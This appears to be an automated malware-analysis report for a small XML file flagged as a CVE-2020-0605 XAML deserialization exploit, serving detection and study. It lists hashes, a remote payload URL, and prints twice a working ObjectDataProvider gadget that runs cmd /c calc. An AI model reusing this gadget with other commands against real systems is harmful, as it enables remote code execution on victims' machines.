Malicious
Malicious

xdfa69.xml

XML
|
MD5: 007bbd422194fd23d021e69590438e63
|
Size: 826 B
|
text/xml

Remote XAML Injection
CVE-2020-0605
XAML Deserialization Exploit
ObjectDataProvider XAML
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
007bbd422194fd23d021e69590438e63
Sha1
7e87cda00ed0c70253cd92e7243b42125d5126da
Sha256
d148bcba96223653e0085699a3b34ce3a4dc43cdab1f2fe1487b7c76f3becf5e
Sha384
7cd9c0789d7424d8198238ca4e854a52d5accf3773e3e0d5ef56967bc1100ee6d947dcf7ce9989c1b62501c98cf9177b
Sha512
40dd81d9e9cbc63a490b88a2b468121a28fd1068a24227cc885c576022aac56c05e0942fa229ef3f466bbf755b738ce27650adc7f277bb62acbbdf4849837ae2
SSDeep
24:yr4+4hSP+y/3oCWXWpWFbnWqnWr3o0w4+QO3:U+dy/3SG41WqWr3v2Q4
TLSH
F801BDD9469E6C10D8F989437AF0E407EC420157A6CAE294B4DC834F6F69980A007AF3
File Structure
xdfa69.xml
Remote XAML Injection
CVE-2020-0605
XAML Deserialization Exploit
ObjectDataProvider XAML
Malicious
Malware Configuration - XAML RCE Payload
Config. Field
 Value
Command

cmd
Arguments

/c calc
Artefacts
Name
 Value
Remote XAML Reference

http://tacck.cc/payload.xaml
XAML Embedded ObjectDataProvider

<ObjectDataProvider MethodName="Start" x:Key="" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"><ObjectDataProvider.ObjectInstance><sd:Process xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="/c calc" FileName="cmd" /></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider>
xdfa69.xml (826 B)
File Structure
xdfa69.xml
Remote XAML Injection
CVE-2020-0605
XAML Deserialization Exploit
ObjectDataProvider XAML
Malicious
Characteristics
Malware Configuration - XAML RCE Payload
Config. Field
 Value
Command

cmd
Arguments

/c calc
Artefacts
Name
 Value Location
Remote XAML Reference

http://tacck.cc/payload.xaml

Malicious

xdfa69.xml
XAML Embedded ObjectDataProvider

<ObjectDataProvider MethodName="Start" x:Key="" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"><ObjectDataProvider.ObjectInstance><sd:Process xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="/c calc" FileName="cmd" /></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider>

Malicious

xdfa69.xml
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙